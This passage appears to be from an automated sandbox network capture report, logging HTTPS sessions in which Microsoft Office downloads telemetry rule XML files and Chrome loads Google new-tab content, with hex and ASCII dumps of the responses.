2024-11-02 16:56:31 UTC	427	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 41 61 5d 5b 4e 6e 5d 5b 41 61 5d 5b 53 73 5d 5b 4f 6f 5d 5b 4e 6e 5d 5b 49 69 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120637" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120635" /> <SR T="2" R="([Pp][Aa][Nn][Aa][Ss][Oo][Nn][Ii][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"

Session ID	Source IP	Source Port	Destination IP	Destination Port
36	192.168.2.7	49743	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-02 16:56:31 UTC	192	OUT	GET /rules/rule120639v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-02 16:56:31 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 02 Nov 2024 16:56:31 GMT Content-Type: text/xml Content-Length: 423 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:36 GMT ETag: "0x8DC582BB7564CE8" x-ms-request-id: 3638edcf-001e-00ad-4f0c-2c554b000000 x-ms-version: 2018-03-28 x-azure-ref: 20241102T165631Z-r159446fcd7tc5j5hC1DFWrhs000000001z0000000001kcn x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-02 16:56:31 UTC	423	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 44 64 5d 5b 59 79 5d 5b 4e 6e 5d 5b 41 61 5d 5b 42 62 5d 5b 4f 6f 5d 5b 4f 6f 5d 5b 4b 6b 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120639" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120637" /> <SR T="2" R="([Dd][Yy][Nn][Aa][Bb][Oo][Oo][Kk])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.7	49741	142.250.186.132	443	2324	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-02 16:56:31 UTC	498	OUT	GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1 Host: www.google.com Connection: keep-alive X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlqHLAQiFoM0BCNy9zQEIucrNAQii0c0BCIrTzQEIpNbNAQj01s0BCKfYzQEI+cDUFRj1yc0BGOuNpRc= Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-11-02 16:56:31 UTC	1042	IN	HTTP/1.1 200 OK Version: 691307345 Content-Type: application/json; charset=UTF-8 X-Content-Type-Options: nosniff Strict-Transport-Security: max-age=31536000 Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]} Accept-CH: Sec-CH-Prefers-Color-Scheme Accept-CH: Sec-CH-UA-Form-Factors Accept-CH: Sec-CH-UA-Platform Accept-CH: Sec-CH-UA-Platform-Version Accept-CH: Sec-CH-UA-Full-Version Accept-CH: Sec-CH-UA-Arch Accept-CH: Sec-CH-UA-Model Accept-CH: Sec-CH-UA-Bitness Accept-CH: Sec-CH-UA-Full-Version-List Accept-CH: Sec-CH-UA-WoW64 Permissions-Policy: unload=() Content-Disposition: attachment; filename="f.txt" Date: Sat, 02 Nov 2024 16:56:31 GMT Server: gws Cache-Control: private X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2024-11-02 16:56:31 UTC	336	IN	Data Raw: 31 66 34 63 0d 0a 29 5d 7d 27 0a 7b 22 75 70 64 61 74 65 22 3a 7b 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 65 6e 2d 55 53 22 2c 22 6f 67 62 22 3a 7b 22 68 74 6d 6c 22 3a 7b 22 70 72 69 76 61 74 65 5f 64 6f 5f 6e 6f 74 5f 61 63 63 65 73 73 5f 6f 72 5f 65 6c 73 65 5f 73 61 66 65 5f 68 74 6d 6c 5f 77 72 61 70 70 65 64 5f 76 61 6c 75 65 22 3a 22 5c 75 30 30 33 63 68 65 61 64 65 72 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 45 61 20 67 62 5f 31 64 20 67 62 5f 50 65 20 67 62 5f 70 64 5c 22 20 69 64 5c 75 30 30 33 64 5c 22 67 62 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 62 61 6e 6e 65 72 5c 22 20 73 74 79 6c 65 5c 75 30 30 33 64 5c 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 5c 22 5c 75 30 30 33 65 Data Ascii: 1f4c)]}'{"update":{"language_code":"en-US","ogb":{"html":{"private_do_not_access_or_else_safe_html_wrapped_value":"\u003cheader class\u003d\"gb_Ea gb_1d gb_Pe gb_pd\" id\u003d\"gb\" role\u003d\"banner\" style\u003d\"background-color:transparent\"\u003e
2024-11-02 16:56:31 UTC	1378	IN	Data Raw: 20 67 62 5f 6e 64 20 67 62 5f 45 64 20 67 62 5f 6b 64 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 76 64 20 67 62 5f 71 64 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 4a 63 20 67 62 5f 51 5c 22 20 61 72 69 61 2d 65 78 70 61 6e 64 65 64 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 61 72 69 61 2d 6c 61 62 65 6c 5c 75 30 30 33 64 5c 22 4d 61 69 6e 20 6d 65 6e 75 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 62 75 74 74 6f 6e 5c 22 20 74 61 62 69 6e 64 65 78 5c 75 30 30 33 64 5c 22 30 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 73 76 67 20 66 6f 63 75 73 61 62 6c 65 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 76 69 65 77 62 6f 78 5c 75 30 30 Data Ascii: gb_nd gb_Ed gb_kd\"\u003e\u003cdiv class\u003d\"gb_vd gb_qd\"\u003e\u003cdiv class\u003d\"gb_Jc gb_Q\" aria-expanded\u003d\"false\" aria-label\u003d\"Main menu\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u00
2024-11-02 16:56:31 UTC	1378	IN	Data Raw: 30 33 63 5c 2f 61 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 76 64 20 67 62 5f 38 63 20 67 62 5f 39 63 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 73 70 61 6e 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 74 64 5c 22 20 61 72 69 61 2d 6c 65 76 65 6c 5c 75 30 30 33 64 5c 22 31 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 68 65 61 64 69 6e 67 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 5c 2f 73 70 61 6e 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 76 Data Ascii: 03c\/a\u003e\u003c\/div\u003e\u003c\/div\u003e\u003cdiv class\u003d\"gb_vd gb_8c gb_9c\"\u003e\u003cspan class\u003d\"gb_td\" aria-level\u003d\"1\" role\u003d\"heading\"\u003e \u003c\/span\u003e\u003c\/div\u003e\u003c\/div\u003e\u003cdiv class\u003d\"gb_v
2024-11-02 16:56:31 UTC	1378	IN	Data Raw: 76 67 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 44 5c 22 20 66 6f 63 75 73 61 62 6c 65 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 68 65 69 67 68 74 5c 75 30 30 33 64 5c 22 32 34 70 78 5c 22 20 76 69 65 77 42 6f 78 5c 75 30 30 33 64 5c 22 30 20 2d 39 36 30 20 39 36 30 20 39 36 30 5c 22 20 77 69 64 74 68 5c 75 30 30 33 64 5c 22 32 34 70 78 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 70 61 74 68 20 64 5c 75 30 30 33 64 5c 22 4d 32 30 39 2d 31 32 30 71 2d 34 32 20 30 2d 37 30 2e 35 2d 32 38 2e 35 54 31 31 30 2d 32 31 37 71 30 2d 31 34 20 33 2d 32 35 2e 35 74 39 2d 32 31 2e 35 6c 32 32 38 2d 33 34 31 71 31 30 2d 31 34 20 31 35 2d 33 31 74 35 2d 33 34 76 2d 31 31 30 68 2d 32 30 71 2d 31 33 20 30 2d 32 31 2e 35 2d 38 2e 35 54 33 32 30 2d 38 31 30 Data Ascii: vg class\u003d\"gb_D\" focusable\u003d\"false\" height\u003d\"24px\" viewBox\u003d\"0 -960 960 960\" width\u003d\"24px\"\u003e \u003cpath d\u003d\"M209-120q-42 0-70.5-28.5T110-217q0-14 3-25.5t9-21.5l228-341q10-14 15-31t5-34v-110h-20q-13 0-21.5-8.5T320-810
2024-11-02 16:56:31 UTC	1378	IN	Data Raw: 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 32 2c 31 34 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 36 2c 36 63 30 2c 31 2e 31 20 30 2e 39 2c 32 20 32 2c 32 73 32 2c 2d 30 2e 39 20 32 2c 2d 32 20 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 7a 4d 31 32 2c 38 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 38 2c 31 34 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 38 Data Ascii: 0.9,2 2,2zM12,14c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM16,6c0,1.1 0.9,2 2,2s2,-0.9 2,-2 -0.9,-2 -2,-2 -2,0.9 -2,2zM12,8c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM18,14c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM18
2024-11-02 16:56:31 UTC	1378	IN	Data Raw: 32 22 5d 2c 22 6d 65 6e 75 5f 70 6c 61 63 65 68 6f 6c 64 65 72 5f 6c 61 62 65 6c 22 3a 22 6d 65 6e 75 2d 63 6f 6e 74 65 6e 74 22 2c 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 62 61 72 5f 68 65 69 67 68 74 22 3a 36 30 2c 22 65 78 70 65 72 69 6d 65 6e 74 5f 69 64 22 3a 5b 33 37 30 30 32 36 33 2c 33 37 30 30 39 34 39 2c 33 37 30 31 33 38 34 5d 2c 22 69 73 5f 62 61 63 6b 75 70 5f 62 61 72 22 3a 66 61 6c 73 65 7d 2c 22 70 61 67 65 5f 68 6f 6f 6b 73 22 3a 7b 22 61 66 74 65 72 5f 62 61 72 5f 73 63 72 69 70 74 22 3a 7b 22 70 72 69 76 61 74 65 5f 64 6f 5f 6e 6f 74 5f 61 63 63 65 73 73 5f 6f 72 5f 65 6c 73 65 5f 73 61 66 65 5f 73 63 72 69 70 74 5f 77 72 61 70 70 65 64 5f 76 61 6c 75 65 22 3a 22 74 68 69 73 2e 67 62 61 72 5f 5c 75 30 30 33 64 74 68 69 73 2e 67 62 61 72 Data Ascii: 2"],"menu_placeholder_label":"menu-content","metadata":{"bar_height":60,"experiment_id":[3700263,3700949,3701384],"is_backup_bar":false},"page_hooks":{"after_bar_script":{"private_do_not_access_or_else_safe_script_wrapped_value":"this.gbar_\u003dthis.gbar
2024-11-02 16:56:31 UTC	794	IN	Data Raw: 67 6c 6f 62 61 6c 54 68 69 73 2e 74 72 75 73 74 65 64 54 79 70 65 73 3b 5f 2e 59 64 5c 75 30 30 33 64 63 6c 61 73 73 7b 63 6f 6e 73 74 72 75 63 74 6f 72 28 61 29 7b 74 68 69 73 2e 69 5c 75 30 30 33 64 61 7d 74 6f 53 74 72 69 6e 67 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 69 7d 7d 3b 5f 2e 5a 64 5c 75 30 30 33 64 6e 65 77 20 5f 2e 59 64 28 5c 22 61 62 6f 75 74 3a 69 6e 76 61 6c 69 64 23 7a 43 6c 6f 73 75 72 65 7a 5c 22 29 3b 5f 2e 56 64 5c 75 30 30 33 64 63 6c 61 73 73 7b 63 6f 6e 73 74 72 75 63 74 6f 72 28 61 29 7b 74 68 69 73 2e 68 68 5c 75 30 30 33 64 61 7d 7d 3b 5f 2e 24 64 5c 75 30 30 33 64 5b 57 64 28 5c 22 64 61 74 61 5c 22 29 2c 57 64 28 5c 22 68 74 74 70 5c 22 29 2c 57 64 28 5c 22 68 74 74 70 73 5c 22 29 2c 57 64 28 5c 22 6d 61 69 6c 74 6f 5c Data Ascii: globalThis.trustedTypes;_.Yd\u003dclass{constructor(a){this.i\u003da}toString(){return this.i}};_.Zd\u003dnew _.Yd(\"about:invalid#zClosurez\");_.Vd\u003dclass{constructor(a){this.hh\u003da}};_.$d\u003d[Wd(\"data\"),Wd(\"http\"),Wd(\"https\"),Wd(\"mailto\
2024-11-02 16:56:31 UTC	380	IN	Data Raw: 31 37 35 0d 0a 29 7b 6c 65 74 20 61 5c 75 30 30 33 64 6e 75 6c 6c 3b 69 66 28 21 65 65 29 72 65 74 75 72 6e 20 61 3b 74 72 79 7b 63 6f 6e 73 74 20 62 5c 75 30 30 33 64 63 5c 75 30 30 33 64 5c 75 30 30 33 65 63 3b 61 5c 75 30 30 33 64 65 65 2e 63 72 65 61 74 65 50 6f 6c 69 63 79 28 5c 22 6f 67 62 2d 71 74 6d 23 68 74 6d 6c 5c 22 2c 7b 63 72 65 61 74 65 48 54 4d 4c 3a 62 2c 63 72 65 61 74 65 53 63 72 69 70 74 3a 62 2c 63 72 65 61 74 65 53 63 72 69 70 74 55 52 4c 3a 62 7d 29 7d 63 61 74 63 68 28 62 29 7b 7d 72 65 74 75 72 6e 20 61 7d 3b 5f 2e 68 65 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 29 7b 67 65 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 75 30 30 33 64 76 6f 69 64 20 30 5c 75 30 30 32 36 5c 75 30 30 32 36 28 67 65 5c 75 30 30 33 64 66 65 28 29 29 3b 72 Data Ascii: 175){let a\u003dnull;if(!ee)return a;try{const b\u003dc\u003d\u003ec;a\u003dee.createPolicy(\"ogb-qtm#html\",{createHTML:b,createScript:b,createScriptURL:b})}catch(b){}return a};_.he\u003dfunction(){ge\u003d\u003d\u003dvoid 0\u0026\u0026(ge\u003dfe());r
2024-11-02 16:56:31 UTC	1378	IN	Data Raw: 38 30 30 30 0d 0a 20 69 6e 73 74 61 6e 63 65 6f 66 20 5f 2e 69 65 29 72 65 74 75 72 6e 20 61 2e 69 3b 74 68 72 6f 77 20 45 72 72 6f 72 28 5c 22 46 5c 22 29 3b 7d 3b 5f 2e 6d 65 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 6c 65 2e 74 65 73 74 28 61 29 29 72 65 74 75 72 6e 20 61 7d 3b 5f 2e 6e 65 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 61 20 69 6e 73 74 61 6e 63 65 6f 66 20 5f 2e 59 64 29 69 66 28 61 20 69 6e 73 74 61 6e 63 65 6f 66 20 5f 2e 59 64 29 61 5c 75 30 30 33 64 61 2e 69 3b 65 6c 73 65 20 74 68 72 6f 77 20 45 72 72 6f 72 28 5c 22 46 5c 22 29 3b 65 6c 73 65 20 61 5c 75 30 30 33 64 5f 2e 6d 65 28 61 29 3b 72 65 74 75 72 6e 20 61 7d 3b 5f 2e 6f 65 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 5c 75 30 Data Ascii: 8000 instanceof _.ie)return a.i;throw Error(\"F\");};_.me\u003dfunction(a){if(le.test(a))return a};_.ne\u003dfunction(a){if(a instanceof _.Yd)if(a instanceof _.Yd)a\u003da.i;else throw Error(\"F\");else a\u003d_.me(a);return a};_.oe\u003dfunction(a,b\u0
2024-11-02 16:56:31 UTC	1378	IN	Data Raw: 6c 61 73 73 4e 61 6d 65 28 61 29 5b 30 5d 3a 28 63 5c 75 30 30 33 64 64 6f 63 75 6d 65 6e 74 2c 61 3f 61 5c 75 30 30 33 64 28 62 7c 7c 63 29 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 61 3f 5c 22 2e 5c 22 2b 61 3a 5c 22 5c 22 29 3a 28 62 5c 75 30 30 33 64 62 7c 7c 63 2c 61 5c 75 30 30 33 64 28 61 3f 62 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 61 3f 5c 22 2e 5c 22 2b 61 3a 5c 22 5c 22 29 3a 62 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 5c 22 2a 5c 22 29 29 5b 30 5d 7c 7c 6e 75 6c 6c 29 29 3b 72 65 74 75 72 6e 20 61 7c 7c 6e 75 6c 6c 7d 3b 5c 6e 5f 2e 41 65 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 5f 2e 47 62 28 62 2c 66 75 6e 63 74 69 6f 6e 28 63 2c 64 29 7b 64 5c 75 30 30 33 64 5c 75 30 30 33 64 5c Data Ascii: lassName(a)[0]:(c\u003ddocument,a?a\u003d(b\|\|c).querySelector(a?\".\"+a:\"\"):(b\u003db\|\|c,a\u003d(a?b.querySelectorAll(a?\".\"+a:\"\"):b.getElementsByTagName(\"*\"))[0]\|\|null));return a\|\|null};\n_.Ae\u003dfunction(a,b){_.Gb(b,function(c,d){d\u003d\u003d\

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.7	49745	142.250.186.132	443	2324	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-02 16:56:31 UTC	353	OUT	GET /async/newtab_promos HTTP/1.1 Host: www.google.com Connection: keep-alive Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-11-02 16:56:31 UTC	957	IN	HTTP/1.1 200 OK Version: 691307345 Content-Type: application/json; charset=UTF-8 X-Content-Type-Options: nosniff Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]} Accept-CH: Sec-CH-UA-Form-Factors Accept-CH: Sec-CH-UA-Platform Accept-CH: Sec-CH-UA-Platform-Version Accept-CH: Sec-CH-UA-Full-Version Accept-CH: Sec-CH-UA-Arch Accept-CH: Sec-CH-UA-Model Accept-CH: Sec-CH-UA-Bitness Accept-CH: Sec-CH-UA-Full-Version-List Accept-CH: Sec-CH-UA-WoW64 Permissions-Policy: unload=() Content-Disposition: attachment; filename="f.txt" Date: Sat, 02 Nov 2024 16:56:31 GMT Server: gws Cache-Control: private X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2024-11-02 16:56:31 UTC	35	IN	Data Raw: 31 64 0d 0a 29 5d 7d 27 0a 7b 22 75 70 64 61 74 65 22 3a 7b 22 70 72 6f 6d 6f 73 22 3a 7b 7d 7d 7d 0d 0a Data Ascii: 1d)]}'{"update":{"promos":{}}}
2024-11-02 16:56:31 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
39	192.168.2.7	49744	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-02 16:56:31 UTC	192	OUT	GET /rules/rule120640v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-02 16:56:31 UTC	491	IN	HTTP/1.1 200 OK Date: Sat, 02 Nov 2024 16:56:31 GMT Content-Type: text/xml Content-Length: 478 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:48 GMT ETag: "0x8DC582B9B233827" x-ms-request-id: de083b16-101e-0079-14f1-2c5913000000 x-ms-version: 2018-03-28 x-azure-ref: 20241102T165631Z-16547b76f7fsjlq8hC1DFWehq000000000q000000000cccw x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-02 16:56:31 UTC	478	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120640" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120639" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
40	192.168.2.7	49750	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-02 16:56:32 UTC	192	OUT	GET /rules/rule120642v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-02 16:56:32 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 02 Nov 2024 16:56:32 GMT Content-Type: text/xml Content-Length: 468 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:24 GMT ETag: "0x8DC582BB046B576" x-ms-request-id: 2d611ff0-901e-002a-3d01-2d7a27000000 x-ms-version: 2018-03-28 x-azure-ref: 20241102T165632Z-16547b76f7fvllnfhC1DFWxkg800000000zg000000007p6d x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-02 16:56:32 UTC	468	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120642" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120641" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
41	192.168.2.7	49748	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-02 16:56:32 UTC	192	OUT	GET /rules/rule120641v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
